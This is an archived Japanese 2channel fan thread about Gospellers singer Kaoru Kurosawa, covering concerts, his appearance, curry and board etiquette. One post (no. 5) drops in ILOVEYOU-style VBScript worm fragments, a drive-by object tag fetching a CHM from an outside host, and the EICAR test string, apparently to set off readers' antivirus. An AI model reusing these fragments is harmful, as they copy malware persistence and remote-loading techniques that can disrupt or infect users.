2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●黒沢薫(ゴスペラーズ)● 2

1 :NO MUSIC NO NAME:2006/12/16(土) 13:31:19 ID:kAi2v9yw
黒沢薫についてマターリ語るスレです。

前スレ
●黒沢薫(ゴスペラーズ)●
ttp://music5.2ch.net/test/read.cgi/musicjm/1130666240/l50

公式サイト
ttp://www.kaorukurosawa.com/

【お約束】
※sage進行推奨
※age厨、教えて厨、荒し、煽り、釣りは完全スルーで
※次スレは980が立てる。立てられない時報告汁

2 :NO MUSIC NO NAME:2006/12/16(土) 13:34:59 ID:cYsqQ8uI
自分で立てて2もGET

3 :NO MUSIC NO NAME:2006/12/16(土) 14:46:47 ID:qh0zfrpN
>>1タソ乙ですー

4 :NO MUSIC NO NAME:2006/12/17(日) 14:12:14 ID:eLkFHaKy
ポン話でスレ2ができるなんてカンドーだ。        それだけポン愛にあふれてるヤシがいるってことだもんね!

5 :NO MUSIC NO NAME:2006/12/17(日) 16:44:53 ID:K19g+BeE
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

ゴスペラーズ酒井はなんで侍医ってあだ名なの?

6 :NO MUSIC NO NAME:2006/12/17(日) 18:19:35 ID:4I0mcFYL
今日のポンレポよろしく〜。

7 :NO MUSIC NO NAME:2006/12/18(月) 01:10:39 ID:yqm16vJI
ポンって未だに身長不明?
ファンサイトでよく「私160pだけど同じ目線だった」という報告がある
流石に160ジャストは無いと思うけど、165以下だったら
漏れ追い越しちゃったよ

8 :NO MUSIC NO NAME:2006/12/18(月) 01:35:33 ID:mht/r8gq
公称165かな。
でも番組共演者と見比べてみるに
165ちょっきりではないように思う

9 :NO MUSIC NO NAME:2006/12/18(月) 03:12:11 ID:r9VSSIXG
顎ラインすっきりして
腰がよく動いてたw





歌以外はよかった

10 :NO MUSIC NO NAME:2006/12/18(月) 05:54:13 ID:TohgXEZ+
歌以外か…

11 :NO MUSIC NO NAME:2006/12/18(月) 16:30:00 ID:SI7TD96k
9
ダイエットして声質落としちゃった?
水泳やってて声が良く出るようになったみたいなコメントをしていたのに・・・。

でも生でポンの腹筋&腰フリフリ見たい。

12 :NO MUSIC NO NAME:2006/12/18(月) 20:20:18 ID:TY+XdX8n
安心汁。
もうすぐユサユサタプタプだよ。

13 :NO MUSIC NO NAME:2006/12/18(月) 21:55:04 ID:jyi/3giE
桐生は腹筋は見えなかったですね〜。
府中では鍛えた甲斐があったね〜と思ったが、
あそこで風邪引いたんじゃないかと疑っております。
体形についてはもうとやかく言わないから、きっちり歌ってね!

14 :NO MUSIC NO NAME:2006/12/19(火) 09:32:51 ID:4V2KnCin
SET LIST 教えて下さい!

15 :NO MUSIC NO NAME:2006/12/19(火) 09:44:55 ID:QL+f35/t
>>14
その前にsage方を知ろうね

16 :NO MUSIC NO NAME:2006/12/19(火) 11:36:53 ID:gjaFqjTm
今日ポンに会いにゆきます。

17 :NO MUSIC NO NAME:2006/12/19(火) 15:59:13 ID:yk2MvmX3
これで?

18 :NO MUSIC NO NAME:2006/12/19(火) 16:04:18 ID:yk2MvmX3
セット リスト お願いします!

19 :NO MUSIC NO NAME:2006/12/19(火) 17:53:20 ID:qpLZDWA8
>>18

つ フルサト

20 :NO MUSIC NO NAME:2006/12/19(火) 20:22:25 ID:+rDNkGCM
紅白「ふるさと」ってニャンダ?
まさか、ウサギ追いし・・・なんとか?
じゃないよね・・・

21 :NO MUSIC NO NAME:2006/12/19(火) 22:19:12 ID:gjaFqjTm
ポンあまり痩せた気しなかったけど、かっこえかった

22 :NO MUSIC NO NAME:2006/12/20(水) 00:50:09 ID:KE1nTiCe
千葉行ってきました。
最前です。
声の調子も視線も体も最高でした。
ウィルスあるから書込みきつい。

23 :NO MUSIC NO NAME:2006/12/21(木) 00:07:16 ID:Vdfd6HSu
最前で視線もカラダも最高ってええなあ
ポン散々な書かれ方してたから、一安心だぁ
1月に見に行くから、期待しとるよ

24 :NO MUSIC NO NAME:2006/12/21(木) 20:42:36 ID:dG0j3hXo
ポンカレー食べました。   チキン大きかったよ!    思った以上に辛かった。

25 :NO MUSIC NO NAME:2006/12/22(金) 12:55:23 ID:xFMFQqAM
SCSの後輩に提供した曲が試聴出来るよ。
ポンの作る曲ツボなんだよね。
セルフカバーして欲しいよ。

26 :NO MUSIC NO NAME:2006/12/22(金) 23:20:35 ID:k7k09qbT
ぽんの腹筋が復活したのに
テツがぷよぷよなのがかなすい・・・

27 :NO MUSIC NO NAME:2006/12/22(金) 23:27:46 ID:u+bBqgDQ
そうだなー・・・二人揃って脱いでくれないとなんかなぁ

>>25
禿胴ノシ
でもゴスが提供する曲って自分たちで歌うには合わないからって
いうものなんだよね。だからセルフは期待できないかも・・・

28 :NO MUSIC NO NAME:2006/12/23(土) 00:27:37 ID:8tROse9X
ポンカレータベテネ(・∀・)/


29 :NO MUSIC NO NAME:2006/12/24(日) 09:32:13 ID:HKkS56CU
昨夜はどうでしたか?

30 :NO MUSIC NO NAME:2006/12/24(日) 19:24:15 ID:DZiTQISX
昨日のSCうれしかったー
ポンの歌う「雪の華」よかったよ
また聞きたい

31 :NO MUSIC NO NAME:2006/12/24(日) 20:55:18 ID:ffeFcgHi
SCは今夜寝る時に聞こう。
「雪の華」が聞けるんだな、ドチドチしちゃうぜw
そっちも気になるがズーコライヌに逝った人はいない?







千葉最前タン裏山
府中で生脱ぎ見た人裏山

32 :NO MUSIC NO NAME:2006/12/24(日) 21:04:28 ID:kSMfKun9
ZOOCOライヌいったよノシ
ダブルのスーツで出てきて、
『セカンドバッグ持ってたらバブルっぽい』って
自分で言ってたw





どっちかと言うと七五三だったけどなwww

33 :NO MUSIC NO NAME:2006/12/25(月) 01:10:29 ID:DgZ+9HUp
七五三!w
そんなポンが、かわゆくてスキだw

34 :NO MUSIC NO NAME:2006/12/25(月) 23:07:47 ID:vhG0gf/Y
ポンにダブルってヤバスだろww
やっぱりセンスナッシンだなww

35 :NO MUSIC NO NAME:2006/12/26(火) 17:10:07 ID:DgyiqOrW
「雪の華」イイ!
雪の降る中で歌うぽんを妄想・・・

36 :NO MUSIC NO NAME:2006/12/27(水) 11:33:29 ID:oB9mG1os
>>35
禿胴、よかった!
カバー曲のアルバム作ってくれないかなぁ

37 :NO MUSIC NO NAME:2006/12/28(木) 13:53:14 ID:HVsD+RyK
36
カバーアルバムなので
タイトルは「ポンカバー」とかどう?
もしほんとに出したら絶対買うよ


38 :NO MUSIC NO NAME:2006/12/28(木) 18:30:40 ID:LnPGujU8
>>37
('A`)

39 :NO MUSIC NO NAME:2006/12/29(金) 00:30:06 ID:U6QS7CzX
基本的にこのスレの2ちゃんとは思えない
まったりとした愛ある感じは好きなんだけど
たまに本気すぎてこわい

40 :NO MUSIC NO NAME:2006/12/29(金) 00:53:41 ID:Lb/cN5Re
>>39
禿同…

41 :NO MUSIC NO NAME:2006/12/29(金) 10:58:08 ID:AR9huPxd
>>39
禿同
ファソサイトでやってほしい、ちょっとキモイ…orz

42 :NO MUSIC NO NAME:2006/12/29(金) 12:30:38 ID:e/IDFBpy
本家もどこも一行化してるし、
こんなもんだと思えばよか。
マターリ上等。



43 :NO MUSIC NO NAME:2006/12/29(金) 17:48:29 ID:xQcxT+Sb
よかよか

ポンは趣味は悪いけど、性格いいぉ

44 :NO MUSIC NO NAME:2006/12/31(日) 21:19:20 ID:Sr5slxXm
見た? 見た?

45 :NO MUSIC NO NAME:2006/12/31(日) 21:22:22 ID:/WnE0beb
見たよ〜

46 :NO MUSIC NO NAME:2006/12/31(日) 21:25:15 ID:JapzmDIN
チャンネル替えたらちょうど歌う所だった。    ポン痩せた気がしたよ。

47 :NO MUSIC NO NAME:2006/12/31(日) 21:44:57 ID:/WnE0beb
1人ずつ出身地って出ましたっけ??

48 :NO MUSIC NO NAME:2006/12/31(日) 21:50:36 ID:HxmF7FZE
ミター
3回ぐらいヒヤッとしたけど良かったよ
今年もトキメチと笑いをありがとう(ワラ
来年もポンはポンでいてくれw

49 :NO MUSIC NO NAME:2006/12/31(日) 22:30:28 ID:/RsNHOnr
>>47
出てないよ。
TOKIOとかも出てなかったから人数多いと出ないんだと思う

50 :NO MUSIC NO NAME:2006/12/31(日) 22:40:15 ID:/WnE0beb
>>49
ありがとうございます

51 :NO MUSIC NO NAME:2006/12/31(日) 23:11:26 ID:Sr5slxXm
ヨカッタ!

52 :NO MUSIC NO NAME:2006/12/31(日) 23:19:31 ID:k6Ns4czu
ふるさと、よかったですよね〜

53 :NO MUSIC NO NAME:2007/01/01(月) 15:39:21 ID:EOgorZkd
おんなじ衣装なのに、一人でペンギンさんみたいにかわいかった。

54 :NO MUSIC NO NAME:2007/01/01(月) 19:01:27 ID:gD0xYnlC
めっちゃ旗振り下手だったなw
なんでステップとか体のリズムとりは下手なんだろう・・・

55 : 【大吉】 【1242円】  :2007/01/01(月) 20:05:40 ID:hwSEBmiW
ふるさとも一人音痴だったしねーw

でも旗振りに上手いも下手もないと思うんだけどw

56 :NO MUSIC NO NAME:2007/01/02(火) 00:28:54 ID:+yGKLeio
>>55
いや下手だよ
ちょっとタイミング早かったし
一人だけ振ってるってゆうか、旗に振り回されてる感じしたもんw

57 :NO MUSIC NO NAME:2007/01/02(火) 02:08:04 ID:RobJMBws
>ちょっとタイミング早かったし

アカペラのときでもどんどん先に逝っちゃうところあるよね。
休むところを休めないつーか、
ホクが一所懸命指揮してるんだけど、目に入っていない。
リズム感が変だと思う。本人ぜんぜん気にしてなさそうだけど。


58 :NO MUSIC NO NAME:2007/01/02(火) 08:52:43 ID:HV22N5z+
ぽんは旗に遊ばれてお遊戯みたいでかわゆかった。
隣りがやけに気合いの入った振り方だったもんで、対比が面白かった。

59 :NO MUSIC NO NAME:2007/01/03(水) 07:25:14 ID:tGHaC70l
変!!

60 :NO MUSIC NO NAME:2007/01/03(水) 13:51:10 ID:QgdoT+aL
チャゲアスの飛鳥の歌い方に似てるって言われるけど
初期の飛鳥は全然違うんだなぁ
チャゲアスのほうを追っていくと飛鳥がだんだんポンの声に似てくる感じ

61 :NO MUSIC NO NAME:2007/01/03(水) 14:31:32 ID:U78RFwK1
でもポンの声も初期の頃に比べたら
変わったような希ガス

年をとったからなのか?w

62 :NO MUSIC NO NAME:2007/01/03(水) 14:47:28 ID:nZRcg+Dn
だんだんこぶしが回るようになってきた。
最終的には演歌にいくかもw
いや、あのカン高い声量のある声は民謡にも向いていると思う。


63 :NO MUSIC NO NAME:2007/01/03(水) 14:56:41 ID:yDc1SLAS
紅白の再放送っていつですか!?

64 :NO MUSIC NO NAME:2007/01/03(水) 15:04:54 ID:yuuV862X
今年も去年一昨年と変わらないなら2/11
あといい子だからsageろ

65 :NO MUSIC NO NAME:2007/01/03(水) 15:41:40 ID:fTxmbcP0
ポンの旗に振り回されてる場面を見逃した漏れは
再放送が待ち遠しくてwktkしてるんだけど
オズマの部分をどうするのかが気になる。
あのままじゃ放送できないよなぁ。

66 :NO MUSIC NO NAME:2007/01/03(水) 16:10:45 ID:XJ+OhgyC
会報きた!
ファッソンは〇
お肌がorz
ホクと一緒にドモホリンリンクル汁!

67 :NO MUSIC NO NAME:2007/01/03(水) 16:15:28 ID:MW6dL9dW
>>65
海外向け放送では
その部分は音声だけ流し、映像は別な映像をいれていたよ。
「都合により、映像は変えてあります・・・」とかなんとかw

68 :NO MUSIC NO NAME:2007/01/03(水) 22:18:00 ID:Fje7+SJH
オズマと一緒に踊り狂ってたオパーイ付全身タイツ着てた姉さん
あれはどーゆー人たちなんだろう?モデル?AV女優?

69 :NO MUSIC NO NAME:2007/01/03(水) 23:21:59 ID:hFq8xWI3
ダンサーでしょ

70 :NO MUSIC NO NAME:2007/01/03(水) 23:25:45 ID:QgdoT+aL
ただのダンサーにあんなのやらせるのはカワイソウダナー(;∀;)
ポン含め、他の出演陣はどんな目で見てたんだろう

71 :NO MUSIC NO NAME:2007/01/03(水) 23:28:04 ID:hFq8xWI3
ヒップホップダンスなんてもっと
すごいじゃんw


72 :NO MUSIC NO NAME:2007/01/04(木) 00:01:52 ID:nPgkCtwr
>>70
麺らは (・∀・)ニヤニヤ じゃねーの?
どっちかっていうと姉さんより
毎度脱いでる両隣の兄さんの方が気になるんだが…。

73 :NO MUSIC NO NAME:2007/01/05(金) 15:37:18 ID:mrzICSFv
メンバー元日から5連休だね。

正月太りしないで欲しいよ。ポン。

74 :NO MUSIC NO NAME:2007/01/06(土) 23:35:29 ID:MXeDjN39
SC、予約失敗してた。
HP見ると楽しそうだな。
今年一発目だったのに・・・orz


75 :NO MUSIC NO NAME:2007/01/07(日) 12:59:21 ID:BVJkPVI0
黒沢さんがK5に提供したAgainって良い曲だね。
思ったより控え目に歌ってたけど、セクシィです

76 :NO MUSIC NO NAME:2007/01/07(日) 13:01:00 ID:BVJkPVI0
K5じゃなく

Kにの間違いですた…┏◯ペコリ

77 :NO MUSIC NO NAME:2007/01/07(日) 23:28:18 ID:2nIMr9h7
横浜カレーミュージアムでポンのおすすめってどの店がわかりますか?

78 :NO MUSIC NO NAME:2007/01/07(日) 23:53:01 ID:z8canAi2
沖縄のでないか?
行ったことないから今もあるか知らんけどw
ミュージアム閉館っていつだっけ?行くなら早目にな

79 :NO MUSIC NO NAME:2007/01/08(月) 00:47:36 ID:j9WbeNVN
今年の3月末<閉館

80 :NO MUSIC NO NAME:2007/01/09(火) 00:35:16 ID:xeV594p2
ゴスのソウル…ラジオ聴きたくても入らないんだけど。。。曲だけでなく黒ぽんの話も色々と聴けるの?!

81 :NO MUSIC NO NAME:2007/01/09(火) 10:31:14 ID:s/qL9ktt
>>80
SCのこと?
いつもはブラックミュージックの話して、お便り読んでそれについて語るー、みたいな感じ。

82 :NO MUSIC NO NAME:2007/01/09(火) 14:55:02 ID:+bNucYc9
Kのポン新曲いいな。
前の曲も良かたけど
今回もイイ!
提供した方が好きだな、最近のポン曲は。
ゴスでも選ばれるようなカッチョイイ曲おながいします。

83 :77:2007/01/09(火) 17:26:17 ID:gP3q2zU9
>>78>>79
dです!
近いうちに行ってみます。

84 :NO MUSIC NO NAME:2007/01/09(火) 17:57:20 ID:xeV594p2
>>81
ありがとです(*嬉´Д`*)聴いてみたいなぁ〜

85 :NO MUSIC NO NAME:2007/01/09(火) 19:29:08 ID:dbxwbVZY
>>84
SCのホームページには一部だけどポンたちの会話も載ってるよ
流した曲の紹介コメントもポンの台詞から抜粋してたりするし

86 :NO MUSIC NO NAME:2007/01/09(火) 20:39:21 ID:xeV594p2
>>85
ありがとうございます。見てきました〜(・∀・)色々と内容が抜粋されていて聴いていなくても分かるような内容でした(O´∀`O)

87 :NO MUSIC NO NAME:2007/01/10(水) 15:36:53 ID:yp9i8eo7
レタスクラブのポンなんか可愛いぞ‥痩せてよかったな。

88 :NO MUSIC NO NAME:2007/01/10(水) 19:42:10 ID:xp3BNHSq
だがそれも半年後には…w

89 :NO MUSIC NO NAME:2007/01/10(水) 21:27:05 ID:brDbXMRH
PATi>PATiで前髪が垂れてるぽんカッコかわいい〜(萌'V艸)

90 :NO MUSIC NO NAME:2007/01/10(水) 23:10:19 ID:cZpjKHZL
今週のカレンダーのポン
ほんっとに古臭い二枚目で禿ワラだぜww

91 :NO MUSIC NO NAME:2007/01/11(木) 00:16:31 ID:CkoE6MDG
ってか,ぽんの奥さん見てみたいんだけど…元モデルだったんでしょ!?

92 :NO MUSIC NO NAME:2007/01/11(木) 00:37:11 ID:+TkZh6Qv
古臭い…せめて昭和顔いってあげてw
平成顔?のポンなんて想像できね

93 :NO MUSIC NO NAME:2007/01/13(土) 17:58:43 ID:mhpSAhja
ソムリエの苦悩の歌のポン、キモイwww
でも癖になるw

94 :NO MUSIC NO NAME:2007/01/13(土) 18:07:28 ID:ZmyMzUEN
なんかものすごく厨臭い深山が増えてるね…

95 :NO MUSIC NO NAME:2007/01/13(土) 23:35:11 ID:DnGTJD5E
厨臭いのがいるなと思えばスルーすれば(・∀・)イイ!!


先週は録音失敗しちまったけど、
今週はリアルで聴けたSC。
盛り上がりに欠けた、来週Kのトークに期待。

>>82
Kへの提供曲。
漏れは前のは悪かないけどいまいちくるもんでもなかったけど、
Ageinいいね、Kとセッションして欲しい。

96 :NO MUSIC NO NAME:2007/01/13(土) 23:46:27 ID:mhpSAhja
先週も比較的大人しかったからポンオタ的には無問題
松崎しげるの歌、ポンに歌って欲しいな。高音域は結構似てると思うんだが

97 :NO MUSIC NO NAME:2007/01/13(土) 23:55:32 ID:DnGTJD5E
スペル間違ってる・・・orz
セッションはないな、ミナー許してくれw


>>96
愛のメモリーをオフにどこぞで歌ったとか聞いた
1人歌いキボンヌ

98 :NO MUSIC NO NAME:2007/01/14(日) 15:19:23 ID:W7RtdjAj
専門誌「関節炎とリウマチ」に、カレーに含まれるウコンの効能に関する研究結果が
発表された。カンザス大の研究者ジャネット・ファンクさんらが、関節炎を起こすよう
育てたマウスにウコンを注射したところ、症状がまったくでなかった。

ミルウォーキー郊外に住むダーシー・ジェーンさん(55)は、野菜たっぷりカレーが
中心のインド料理教室に通い、週1、2回、インド料理を食すようにしたところ、悩みだった
関節の炎症、はれがなくなった。ジェーンさんは夜中に空腹感を覚えなくなり、90キロに
近かった体重の23キロの減量に成功したという。

99 :NO MUSIC NO NAME:2007/01/14(日) 19:49:19 ID:NawNKrn6
カレーを食べて痩せるような人間は
コーラと肉で華麗にピザるアメリカ人ぐらいだよ

しかしぽんの関節炎とリウマチの心配はないのはナイス

100 :NO MUSIC NO NAME:2007/01/14(日) 21:16:35 ID:XiH6+EkT
30半ばくらいではまだ心配いらにゃあだよ。
成人病はこれからさ。

101 :NO MUSIC NO NAME:2007/01/15(月) 00:41:02 ID:96Kuu/YP
×成人病
○生活習慣病

一般に30〜40歳代以上の世代から発症しやすくなり、かつその発症に
生活習慣(食事習慣、運動習慣、肥満、喫煙、飲酒など)が深く関わると
考えられている病気の総称である。

102 :NO MUSIC NO NAME:2007/01/15(月) 11:34:41 ID:RuxDIXzh
>95
前のKの曲、実はKが歌ってるの聞いたことないんだw
ポンが歌っててスゲーきた!
20代のポンに歌って欲しい
 
ラジオでならセッションありそうだけどな

103 :NO MUSIC NO NAME:2007/01/15(月) 19:38:31 ID:6ivrFukr
最近ぽん太りぎみのせいか歌うのキツそう。
ゴスペラーズの運命が…

104 :NO MUSIC NO NAME:2007/01/15(月) 20:21:43 ID:w+4bZnIY
最近のPはむしろ痩せている方だと思うが?

105 :NO MUSIC NO NAME:2007/01/15(月) 20:31:55 ID:9O8Kg0/H
太ってる人は声量ある人が多いんじゃない?

106 :NO MUSIC NO NAME:2007/01/15(月) 20:42:46 ID:6ivrFukr
いや、でもテレビで有名コンポーザーが素人ボーカルに体重を落とすことは歌うときに大切だと言ってた。
てかぽんも北山と同じもの食べればいいのに。

107 :NO MUSIC NO NAME:2007/01/15(月) 20:48:07 ID:9O8Kg0/H
今くらいで十分だと思うよ@ぽん
北山ほど痩せたらいやだ。

108 :NO MUSIC NO NAME:2007/01/15(月) 20:50:16 ID:D+m6mRoA
輪郭からして、あまり痩せてしまうと格好良くない顔になりそうだ
丸っこいくらいが丁度いい顔だと思う

109 :NO MUSIC NO NAME:2007/01/15(月) 21:06:04 ID:zkUhOo9B
age厨はスルーがお約束

110 :NO MUSIC NO NAME:2007/01/15(月) 21:06:16 ID:6ivrFukr
ぢゃあぽんが北山並みに恋愛体質だったらどぉする

111 :NO MUSIC NO NAME:2007/01/15(月) 22:40:13 ID:RuxDIXzh
カレー博物館閉館まで
あと 75 日

ポンは行ったことあるんかな?

112 :NO MUSIC NO NAME:2007/01/15(月) 22:46:59 ID:6ivrFukr
最近オフが多かったから一回くらいゎいったんぢゃなぃ

113 :NO MUSIC NO NAME:2007/01/15(月) 23:46:37 ID:xo+p4q+7
最近またカレー食べ始めているみたいだな
順調に成長しているのかw

114 :NO MUSIC NO NAME:2007/01/16(火) 00:13:32 ID:LKstjsJF
最近ってぃうか、ぽんゎ一度たりともカレーから離れたことナィんじゃなぃ(笑)

115 :NO MUSIC NO NAME:2007/01/16(火) 00:25:01 ID:OJz48oWJ
そっちの成長は勘弁だよな。
声長なら歓迎w
丸くても、声が出てればいいや。
カコヨク痩せても、声がでないポンは嫌。




本音:カコヨク痩せて、イイ声のポンが一番好き

116 :NO MUSIC NO NAME:2007/01/16(火) 00:35:02 ID:LKstjsJF
ぽんも好きだが、一番好きなのは北山☆
まぢタイプ(*´д`*)

117 :NO MUSIC NO NAME:2007/01/16(火) 00:35:41 ID:A7e/4kL/
あのーさっきからageてる奴いい加減にしてくれないか?
ageてる、小文字乱用。
此処はお前みたいな厨が来る場所じゃない。
不愉快。

118 :NO MUSIC NO NAME:2007/01/16(火) 00:51:56 ID:OJz48oWJ
>117
そんなヤシいない
いたらスルー汁!
スルー出来ないヤシも厨言われるぞww
 
どこの店だったか…
壁にポンのサインあった。
WCに行く直前に見てビクーリした

119 :NO MUSIC NO NAME:2007/01/16(火) 01:10:33 ID:LKstjsJF
ageとかって何?

》118 まぢで〜?あたし今まで生のメンバーのサイン見たことナィ(つд`)
前中村屋でぽんカレー食べに行った時サインなくて悲しかったぁ↓

120 :NO MUSIC NO NAME:2007/01/16(火) 01:33:58 ID:oDYve69j
なんでもかんでも人に聞こうとしないで
それくらい調べて理解してここの板の雰囲気を掴んでから書き込みなさい

121 :NO MUSIC NO NAME:2007/01/16(火) 01:39:55 ID:LKstjsJF

ぢゃあイイョ。知らないまんまで(*`3´)

122 :NO MUSIC NO NAME:2007/01/16(火) 01:43:21 ID:oDYve69j
なんだ真性リアだったか
自分がどれだけうざがられているか分からない奴に
何言っても無駄だな
>>118
スマソ、絡んじまったよ吊ってくる

123 :NO MUSIC NO NAME:2007/01/16(火) 07:01:39 ID:6M7oBoV3
どこも厨が氾濫しているのは何故なのだろう

髪型はもうあの右垂れツンツンスタイルで固定なのか・・・
たしかに似合うけど、新しいのがみたい('A`)

124 :NO MUSIC NO NAME:2007/01/16(火) 09:03:17 ID:LKstjsJF
でもぽんゎ短い髪しか似合わなぃ気がするなぁ。
北山みたぃにしても変だし、ヤスもてっちゃんのも似合わないでしょ。酒井さんみたいにするのも無理だし。
髪型変えるとしたらどんな系になんだろ〜

125 :NO MUSIC NO NAME:2007/01/16(火) 09:24:57 ID:v9jz3goR
sageれ

126 :NO MUSIC NO NAME:2007/01/16(火) 09:33:32 ID:LKstjsJF
[sage]

これでオケ?

127 :NO MUSIC NO NAME:2007/01/16(火) 09:47:03 ID:6umPgmvJ
ぽん自身が一つの髪型じゃ満足できなさそうだけど
似合ってる髪形がやっぱりいいな。
多少バリエーションありで、今の髪型を保ってほしいよ。

128 :NO MUSIC NO NAME:2007/01/16(火) 09:47:13 ID:A7e/4kL/
もういい加減にしてくれ
メール欄に半角小文字で「sage」を入れろ
初心者板逝けよ





もう完璧スルーで

129 :NO MUSIC NO NAME:2007/01/16(火) 10:27:43 ID:LKstjsJF
てかsageとか他の板でゎなかったょ?
なんか当たり前みたいに言わないでよ。


ぽんカレー(本)の時の髪型が好きだなぁ。あと一昨年の冬くらい。
最近はぽんより、リーダーとヤスの髪型が一番直して欲しい。あれ嫌だ。

130 :NO MUSIC NO NAME:2007/01/16(火) 10:36:24 ID:v9jz3goR
sage

131 :NO MUSIC NO NAME:2007/01/16(火) 13:24:13 ID:Smh0YYWm
【ローカルルール】
【半年ROM】
【空気嫁】

意味わかんなかったらもう来んな

132 :NO MUSIC NO NAME:2007/01/16(火) 13:49:29 ID:6M7oBoV3
>>127
いいね、バリエーション
たまに前髪全部垂らしたり、オールバックとかw
そういえばちょっと前の襟足が長いのは良かったな、今は知らないけど


|
|
|ξ*・∀・) とりあえずテンプレ置いておくよ
|o   ヾ   ポンタンとのお約束は守ってね
|―u'   >>1
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

133 :NO MUSIC NO NAME:2007/01/16(火) 14:40:09 ID:LKstjsJF
〉131
それちゃんとわかるよ。

134 :NO MUSIC NO NAME:2007/01/16(火) 17:19:59 ID:EMjoOkuA
>>132
アカペラの時のパイナポーは苦手だなー
バリエにあそこまで髪立てるのは入れなくていいw

135 :NO MUSIC NO NAME:2007/01/16(火) 23:25:07 ID:OJz48oWJ
>134


あんまり短いのは嫌だが、長いのも嫌だ
5鍵あたりの体と髪に戻って欲しい
無理だろうけどw

136 :NO MUSIC NO NAME:2007/01/17(水) 08:20:39 ID:/gvSOiza
そういえば,左耳にピアス開けたのはいつ頃なんだ?

137 :NO MUSIC NO NAME:2007/01/17(水) 09:47:36 ID:5zbWrTUF
ソロのときだよ
今は両耳に開けるかどうか悩んでいるらしい

138 :NO MUSIC NO NAME:2007/01/17(水) 11:00:48 ID:/gvSOiza
↑サンクス
悩んでるんだ〜ぽんはピアス似合うよね

139 :NO MUSIC NO NAME:2007/01/17(水) 11:13:10 ID:D3WCAS9c
確かに似合う〜
でも両耳はあけない方が素敵な気がするな

140 :NO MUSIC NO NAME:2007/01/17(水) 15:47:26 ID:YpTITbQ4
でも、ピアス穴空けまくってチャラ男になるのは勘弁
ただでさえボケっとしたキャラなんだから・・・w

141 :NO MUSIC NO NAME:2007/01/17(水) 17:17:42 ID:Y+DAttoZ
ピアス=チャラ男って・・・
あと片耳ピアスはださいです

142 :NO MUSIC NO NAME:2007/01/17(水) 17:50:29 ID:/gvSOiza
片耳ピアスってださいの!?

143 :NO MUSIC NO NAME:2007/01/17(水) 17:56:45 ID:D3WCAS9c
いや、男のくせに両耳ピアスの方がダサい。
ただし右に2つ左に1つとかだったらオケ。
しかしゴスペラーズたるもの3つも開けてはいけない気がする。

144 :NO MUSIC NO NAME:2007/01/17(水) 18:44:02 ID:5zbWrTUF
皆、気付け
ピアスをしても、服のセンスがアレだぞw

145 :NO MUSIC NO NAME:2007/01/17(水) 18:51:12 ID:/gvSOiza
何か軟骨に開けても似合いそうじゃないか?ってか,ぽんってセンス悪い方なの?

146 :NO MUSIC NO NAME:2007/01/17(水) 19:11:14 ID:Y+DAttoZ
>>143
いや、男片耳ピアスはもうださい
ちょいとメンズのファッション雑誌めくってみ

147 :NO MUSIC NO NAME:2007/01/17(水) 20:14:25 ID:YpTITbQ4
>>143
同意
日本でほいほいピアスしてる男は、ストリート系くらいだよね
ファッソンに詳しくはないけど、ポンは絶対違うw

148 :NO MUSIC NO NAME:2007/01/17(水) 21:00:51 ID:EeD32VYq
ポンはむしろ艶男っぽい感じ?
雑誌で言うなら、LEONとか読んでそう。

149 :NO MUSIC NO NAME:2007/01/17(水) 22:38:50 ID:IRP0iryE
醜男に見えた。

150 :NO MUSIC NO NAME:2007/01/18(木) 09:10:09 ID:U407nwAW
長崎で満員電車に乗ってどこに行ってたんだろ。
やっぱカレー屋?w
しかもばあちゃんに席譲るとは、
当たり前なことだが男前だよ、ぽんちゃん!


151 :NO MUSIC NO NAME:2007/01/18(木) 13:25:55 ID:mZ36JFQq
普段のポン見た人裏山。

昔のオールバックの髪型も好きだけど、やらないよね。
もしかしておでこ周辺がやばい?
と疑ってみてるのだが。
ピアスは嫌だ。やめて欲しい。

ポンに色々妄想する日々(^^)





152 :NO MUSIC NO NAME:2007/01/18(木) 15:40:16 ID:ZONESYcE
私はピアスもリングもイヤ
そういう男の人が左手薬指に結婚指輪してるのにグッとくる。
でも、ぽんは指輪の相手が相手だから う〜ん・・


153 :NO MUSIC NO NAME:2007/01/18(木) 15:40:58 ID:ZONESYcE
ごめんっ ageちった!

154 :NO MUSIC NO NAME:2007/01/18(木) 15:45:52 ID:DdzVLVpf
相手って加緒里のこと?
まぁ、ゴスペラーズで一番乗りで結婚に踏み切った男だからね。
ぽんはいつの間にそんな関係になったんだろうと思うほど突然結婚した気がする。

155 :NO MUSIC NO NAME:2007/01/18(木) 15:53:31 ID:4vPOuZru
いろいろ噂があったでしょう。
実際に交際期間も長いみたいだし。

人それぞれ好みも違うわけだし
個人的に被害を受けてるとか相手が犯罪者とかじゃなければ
誰と結婚してもいいけどね〜。

本人たちが幸せならね。


156 :NO MUSIC NO NAME:2007/01/18(木) 17:55:09 ID:DdzVLVpf
へぇ、そうなんだ。
まぁどうでもいいな、ぽんの噂なんて。

加緒里に子づくり嫌がられたってのが哀れだの一言に尽きるな。

157 :NO MUSIC NO NAME:2007/01/18(木) 17:57:11 ID:DlaAEC1y
でも今は子もいるんだし
中悪いわけじゃないんじゃないか?


158 :NO MUSIC NO NAME:2007/01/18(木) 18:23:57 ID:DdzVLVpf
いつの間に子供生まれたん?

159 :NO MUSIC NO NAME:2007/01/18(木) 18:33:59 ID:4vPOuZru
とっくに生まれてる

160 :NO MUSIC NO NAME:2007/01/18(木) 18:36:54 ID:ZONESYcE
ホントにぽんの子?

161 :NO MUSIC NO NAME:2007/01/18(木) 18:52:17 ID:DdzVLVpf
疑わしいけど、でもソロライブのときに観客席から「パパー」って声が聞こえたらしいで

